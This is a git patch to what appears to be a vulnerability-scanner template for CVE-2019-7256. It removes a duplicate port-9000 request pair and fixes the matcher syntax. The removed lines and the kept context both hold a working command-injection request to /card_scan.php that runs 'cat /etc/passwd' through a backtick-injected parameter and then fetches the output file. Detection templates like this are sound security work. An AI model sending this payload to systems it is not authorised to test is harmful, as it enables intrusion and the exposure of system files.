From a2fe4e99326620d71d5d9acea5b71b45fba62836 Mon Sep 17 00:00:00 2001
From: bauthard <8293321+bauthard@users.noreply.github.com>
Date: Mon, 7 Sep 2020 02:22:50 +0530
Subject: [PATCH] few updates

---
 cves/CVE-2019-7256.yaml | 25 ++-----------------------
 1 file changed, 2 insertions(+), 23 deletions(-)

diff --git a/cves/CVE-2019-7256.yaml b/cves/CVE-2019-7256.yaml
index 332b1cb4cd..fe2ba4d5ea 100644
--- a/cves/CVE-2019-7256.yaml
+++ b/cves/CVE-2019-7256.yaml
@@ -11,28 +11,6 @@ info:
 
 requests:
   - raw:  # Default Port
-      - | #Sending Command
-        GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1
-        Host: {{Hostname}}:9000
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-        Accept-Language: en-US,en;q=0.5
-        Accept-Encoding: gzip, deflate
-        DNT: 1
-        Connection: close
-        Upgrade-Insecure-Requests: 1
-      - | #Get Root
-        GET /nuclei.txt HTTP/1.1
-        Host: {{Hostname}}:9000
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-        Accept-Language: en-US,en;q=0.5
-        Accept-Encoding: gzip, deflate
-        DNT: 1
-        Connection: close
-        Upgrade-Insecure-Requests: 1
-
- #######
       - |
         GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1
         Host: {{Hostname}}
@@ -54,10 +32,11 @@ requests:
         Connection: close
         Upgrade-Insecure-Requests: 1
 
+    matchers-condition: and
     matchers:
       - type: status
         status:
           - 200
       - type: word
-        word:
+        words:
           - "root:"